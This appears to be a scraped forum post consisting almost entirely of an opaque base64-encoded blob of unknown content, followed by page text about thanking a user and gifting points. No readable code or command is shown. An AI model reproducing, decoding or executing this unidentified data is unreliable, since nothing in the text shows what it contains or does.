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

Thank NAME, for their help.

Let NAME know exactly why they deserved these points.

Gift a custom amount of points.